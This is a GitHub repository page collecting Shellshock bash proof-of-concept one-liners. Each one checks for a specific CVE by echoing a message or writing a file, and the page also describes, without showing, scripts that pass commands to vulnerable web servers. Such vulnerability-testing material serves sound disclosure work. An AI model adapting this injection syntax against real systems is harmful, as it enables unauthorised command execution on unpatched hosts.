• Stars
    star
    881
  • Rank 51,820 (Top 2 %)
  • Language
    Python
  • License
    MIT License
  • Created about 10 years ago
  • Updated over 4 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Collection of Proof of Concepts and Potential Targets for #ShellShocker

Shellshocker - Repository of "Shellshock" Proof of Concept Code

Collection of Proof of Concepts and Potential Targets for #ShellShocker

Wikipedia Link: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details

Please submit a pull request if you have more links or other resources

Speculation:(Non-confirmed possibly vulnerable)

If you know of PoCs for any of these, please submit an issue or pull request with a link.

Command Line (Linux, OSX, and Windows via Cygwin)

  • bashcheck - script to test for the latest vulns

CVE-2014-6271

  • env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

CVE-2014-7169

will create a file named echo in cwd with date in it, if vulnerable

  • env X='() { (a)=>\' bash -c "echo date"; cat echo

CVE-2014-7186

  • bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

CVE-2014-7187

  • (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

CVE-2014-6278

CVE-2014-6277

will segfault if vulnerable

IBM z/OS -

HTTP

Phusion Passenger

DHCP

SSH

OSX

OSX - with reverse DNS (CVE-2014-3671.txt)

SIP

Qmail

Postfix

FTP

OpenVPN

Oracle

TMNT

Hand

user@localhost:~$ env X='() { (a)=>\' /bin/bash -c "shellshocker echo -e \"           __ __\n          /  V  \ \n     _    |  |   |\n    / \   |  |   |\n    |  |  |  |   |\n    |  |  |  |   |\n    |  |__|  |   |\n    |  |  \  |___|___\n    |  \   |/        \ \n    |   |  |______    |\n    |   |  |          |\n    |   \__'   /     |\n    \        \(     /\n     \             /\n      \|            |\n\""; cat shellshocker
/bin/bash: X: line 1: syntax error near unexpected token `='
/bin/bash: X: line 1: `'
/bin/bash: error importing function definition for `X'
           __ __
          /  V  \ 
     _    |  |   |
    / \   |  |   |
    |  |  |  |   |
    |  |  |  |   |
    |  |__|  |   |
    |  |  \  |___|___
    |  \   |/        \ 
    |   |  |______    |
    |   |  |          |
    |   \__'   /     |
    \        \(     /
     \             /
      \|            |

CUPS

IRC

Scripts from @primalsec

  • shell_shocker.py - Good for interacting with a known vulnerable URL to pass commands (User-Agent Method)
  • w3af_shocker.py - Automates the process of running a w3af spider/shell_shock scan (User-Agent Method)
  • shell_sprayer.py - Checks across a list of URLs in a file, or a single URL against a known list of cgi-bin resources (User-Agent Method)

More Repositories

1

post-exploitation

Post Exploitation Collection
C
1,554
star
2

post-exploitation-wiki

Post Exploitation Wiki
HTML
507
star
3

solarflare

SolarWinds Orion Account Audit / Password Dumping Utility
C#
342
star
4

netview

Netview enumerates systems using WinAPI calls
C++
280
star
5

vt-notify

Get email notification when Virus Total has a copy of your binary.
Ruby
164
star
6

CVE-2021-44228-Log4Shell-Hashes

Hashes for vulnerable LOG4J versions
153
star
7

IOXIDResolver

IOXIDResolver.py from AirBus Security
Python
152
star
8

osx-wificleaner

Cleans out "open" wireless connections from OSX machine
Python
151
star
9

pykek

Kerberos Exploitation Kit
Python
125
star
10

howtowinccdc

Notes, Slides, Comments and Commands on How to Win CCDC
117
star
11

akb

Attack Knowledge Base
100
star
12

cfdb

Common Findings Database
99
star
13

Not-In-Pentesting-Class

The Dirty Secrets They Didn't Teach You In Pentesting Class
Ruby
94
star
14

repos

List of Repositories
89
star
15

open-ssids

SSIDs for the Hak5 Wifi Pineapple's PineAP setup
79
star
16

ditto

Binary resource copier
Objective-C
78
star
17

WhiteChapel

password cracking front end
CSS
57
star
18

sectaskbars

Security Product Taskbar Icons (to identify from screenshots)
55
star
19

tools

Operational toolset utilizing git's submodule feature
Lua
52
star
20

FakeNetBIOS

See here:
C
41
star
21

stuff

Things I've coded, or use (cause I can't find them online anymore)
Ruby
33
star
22

DeleteThatTweet

Monitors a Twitter stream and saves off any tweet that is deleted.
Ruby
26
star
23

manage2decrypt

ManageEngine OpManager Decryption Tools
Python
26
star
24

windows-hardening

Because I can't find scripts to do this anywhere else...
25
star
25

windows-declutter

Windows 10 De-Clutter script
PowerShell
24
star
26

ccdc_malware

Talk given at DerbyCon and RuxCon 2016
22
star
27

mubix.github

Malicious Link Blog
HTML
22
star
28

local-hibp

How to set up a local copy of Have-I-Been-Pwned's password checking service
Ruby
21
star
29

whitechapel-ng

Next Generation of White Chapel
Ruby
21
star
30

attackbox

Ansible scripts to build an attack box
Shell
21
star
31

lmo

LetMeOutOfYour.net Resources
Python
19
star
32

metasploitwiki

Clone of Metasploit's wiki w/ additions
HTML
15
star
33

Interceptor

PowerShell HTTP(s) Intercepting Proxy
PowerShell
14
star
34

hackingtogether

#HackingTogether
HTML
14
star
35

securitytitles.com

Standardizing Security Titles
13
star
36

ctf

Capture The Flag Information
JavaScript
12
star
37

GScriptOldEmal

Deletes old email from my Gmail accounts
JavaScript
12
star
38

twitter-list-follow

Follow all members of a list
Ruby
11
star
39

elgamalcrypto

Simple Python Elgamal Encryption and Decryption Tool
Python
8
star
40

presentations

Public copies of my previous presentations
7
star
41

bliizard_escalation

6
star
42

decryptcpuu

Decrypt "Unrestricted" CPUU.ini passwords
C++
6
star
43

ctfjournal.com

CTF Journal Blog - All are welcome
6
star
44

twitterfriendsopml

Generate an OPML based on the URLs in the people you follow on Twitter's bios
Python
5
star
45

portals

Repository of captive portals from around the world
5
star
46

8021xbridge

Automatically exported from code.google.com/p/8021xbridge
Shell
4
star
47

disappeared

Repo of sites and tools that went %POOF%
3
star
48

meterpy

Meterpreter On-target Python Scripts
3
star
49

random-scripts

Just random scripts of things I don't want to lose
Ruby
3
star
50

squirtle

A fork of the Squirtle project from: http://code.google.com/p/squirtle/
3
star
51

PowerWorm

Analysis, detection, and removal of the "Power Worm" PowerShell-based malware
PowerShell
2
star
52

mubix

2
star
53

ntlmv1des

Cracks DES C3 piece of NTLMv1 and combines into Crack.sh format
1
star
54

epilogue

ShmooCon Epilogue Website
HTML
1
star